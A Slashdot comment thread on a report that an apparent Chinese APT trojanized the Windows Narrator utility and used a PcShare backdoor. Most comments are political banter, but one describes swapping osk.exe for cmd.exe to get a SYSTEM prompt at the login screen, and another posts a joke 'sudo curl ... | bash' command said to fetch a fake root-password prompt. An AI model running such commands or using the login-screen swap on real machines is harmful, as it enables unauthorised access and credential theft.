'Narrator' Windows Utility Trojanized To Gain Full System Control (threatpost.com) 34
A suspected Chinese advanced persistent threat (APT) group has been spotted attacking tech companies using a trojanized screen-reader application, replacing the built-in Narrator "Ease of Access" feature in Windows. Threatpost reports: The attackers also deploy a version of the open-source malware known as the PcShare backdoor to gain an initial foothold into victims' systems. Using the two tools, the adversaries are able to surreptitiously control Windows machines via remote desktop logon screens, without the need for credentials.
The attacks begin by delivering the PcShare backdoor to victims via spearphishing campaigns. It has been modified and designed to operate when side-loaded by a legitimate NVIDIA application. It is "specifically tailored to the needs of the campaign, with additional command-and-control (C2) encryption and proxy bypass functionality, and any unused functionality removed from the code," explained researchers with BlackBerry Cylance, in an analysis posted on Wednesday. The unused functionality includes audio/video streaming and keyboard monitoring, suggesting that it's strictly being used to install other malware.
The attacks begin by delivering the PcShare backdoor to victims via spearphishing campaigns. It has been modified and designed to operate when side-loaded by a legitimate NVIDIA application. It is "specifically tailored to the needs of the campaign, with additional command-and-control (C2) encryption and proxy bypass functionality, and any unused functionality removed from the code," explained researchers with BlackBerry Cylance, in an analysis posted on Wednesday. The unused functionality includes audio/video streaming and keyboard monitoring, suggesting that it's strictly being used to install other malware.
Re: (Score:3)
How soon we forget, Obama was President when the Seal Team whacked Osama. Actually, it was Obama who insisted on there being a backup helicopter handy in case the first (or was it two) got in trouble, and one did, and the backup was needed to evacuate the Seals.
Re: (Score:2)
Wait, Obama used baby seals to kill Osama? What a monster!
Re: (Score:2)
Yep, don't tell Fox, their talking heads will explode.
Re: (Score:2)
Silly Bush. He shouldn't have emptied the convenient scapegoat closet by killing Bin Laden.
Nice try, but it was President Obama that killed Bin Laden, no matter how much you try to rewrite history.
Re: (Score:2)
yea, not sure how someone can get that confused, especially considering that there is a Famous picture of everyone huddled around in a room with Obama clearly front and center over it all.
But, it's also not surprising since I do see this kind of confusion on a daily basis anyways.
Re: (Score:2)
Nice try, but it was President Obama that killed Bin Laden, no matter how much you try to rewrite history.
Robert James O'Neill [wikipedia.org] killed Osama Bin Laden.
Re: (Score:2)
Bush had an opportunity to get Bin Laden. The terrorist was all but cornered in Tora Bora. Over two days officers on the ground pleaded for more troops to cut off the last of the escape routes. British commandos picked up radio communications from Bin Laden which sounded as if he had given up, that he was sorry for everything and telling everyone to escape as best they could. Their estimate put
I literally forgot. (Score:1)
Ok, that one's on me. I literally misremembered.
But getting triggered like four year old Trumps and just assuming it was meant as a flame or something.... that is on everyone else here. --.--
Seriously, this is like a kindergarden.
Re: (Score:2)
I wasn't flaming you, but seriously- if you make a mistake and other people correct you, how is that equate to them being 'triggered'?
How is that flamebait? HUMOR anyone? (Score:1)
Did /. turn into a SJW safe space for.triggered snowflakes with no humor all of a sudden?
Jeez, get a therapy! It will do you and us a favor!
Summary (Score:4, Interesting)
Some people convinced other people via spearfishing to install some software on their computer. The software ran.
Re: (Score:2)
Pretty much. Also, they got spotted.
Still a thing. (Score:2)
At least/most the exploit requires user interaction. That might be a good or bad thing depending, although I'm sure there are suckers out there. This reminds me of the days of the Windows 95 "ping of death," Subseven, Back Orifice, etc.
Admittedly I didn't RTFA, but I'm wondering how Windows UAC, local admin permissions, and whatnot come into play. In a corporate environment once local admin permissions for signed-in users was removed years ago it definitely helped curtail some of this.
Re: (Score:2)
Okay I broke down and RTFA. Definitely a clever binary. Not to mention how Narrator runs as SYSTEM and is piggybacked. So UAC and local admin permissions don't even come into play. And when I was referring to removing local admin perms in my post above, I was referring to my own corporate environment. Obviously that's an option any company with common sense should observe!
Re: (Score:2)
Even for things that require User Interaction, a person on a bad day even one who knows what they are doing, are sometimes just a miss-click away from opening a security threat. I have been relatively lucky in my 20+ year career where my code hasn't been (knowingly) hacked, and I wasn't responsible for starting a security problem, and I don't remember a time where my PC was ever infected by a virus. (Granted a good fraction of those 20+ years I have been using Linux and Macs when they weren't targets). No
Re: (Score:2)
Agreed. At my workplace, I'm going on 20 years in a few months, and the amount of defenses we've layered over the years is something else. Everything from bolstered local A/V to DNS-based security to perimeter-based appliances to security analytics to ad nauseum. But still the last line of defense is the enduser. With all of that in place there still is a chance that someone could quickly click something they shouldn't or read through a well-crafted spearphishing e-mail too quickly. So we try to proactively
I used those tools to bypass XP deactivation (Score:3)
It's nice to know that these "ease of access" tools are still such lovely security risks!
Re: (Score:2)
It's nice to know that these "ease of access" tools are still such lovely security risks!
Oh, that's only recently been fixed - Win10 1803, I think? It was handy when you didn't have an admin password - boot up a recovery environment (like a Win10 install CD), rename c:\windows\system32\osk.exe to osk.exe.old, copy cmd.exe to osk.exe, and reboot. Using the on-screen keyboard at the login screen would launch an administrative command prompt that would happily let you 'net use' your way into a password reset or a new admin prompt.
You can do that on basically any Windows OS, desktop or server, up u
Re: (Score:3)
That's funny (Score:2)
I also like to trojanize myself to gain full system access...
Hey, betcha didn't expect that with your morning coffee, didn't you?
Posting cheap shots since the last century
Re: (Score:2)
Probably more then you think.
I have seen this feature used with people with dyslexia to help break down words they may not have seen before. People with limited eye-sight, while not completely blind, however reading from the computer screen is difficult for them. I have seen people with the feature, when they are working on multiple computers, that reads their emails to them, while they are working on a different computer.
Many accessibility features are used because they are useful features overall, and s
As usual... (Score:3, Funny)
As usual, Linux users are left out in the cold like second-class citizens of the computing world and cannot enjoy this latest shiny malware/trojan.
Re:As usual... (Score:5, Insightful)
Google with Android, has implemented the Linux kernel in a way so it is one of the worlds greatest source of spyware ever. All these hacks are small potatoes.
Re: (Score:2)
Re: (Score:2)
Just run "sudo curl http://houghi.org/trojan [houghi.org]|bash".
HTH, HAND.
Tried it, didn't work. What was I supposed to see?
Re: (Score:2)
A fake login prompt for the root password.
(Is your sudo working properly, try copy-pasting the link into your web browser to see what I'm talking about for a quick look-see)
Re: (Score:2)
A fake login prompt for the root password.
(Is your sudo working properly, try copy-pasting the link into your web browser to see what I'm talking about for a quick look-see)
LOL, I'm kidding. I'd never curl to an unknown location "just to see what would happen".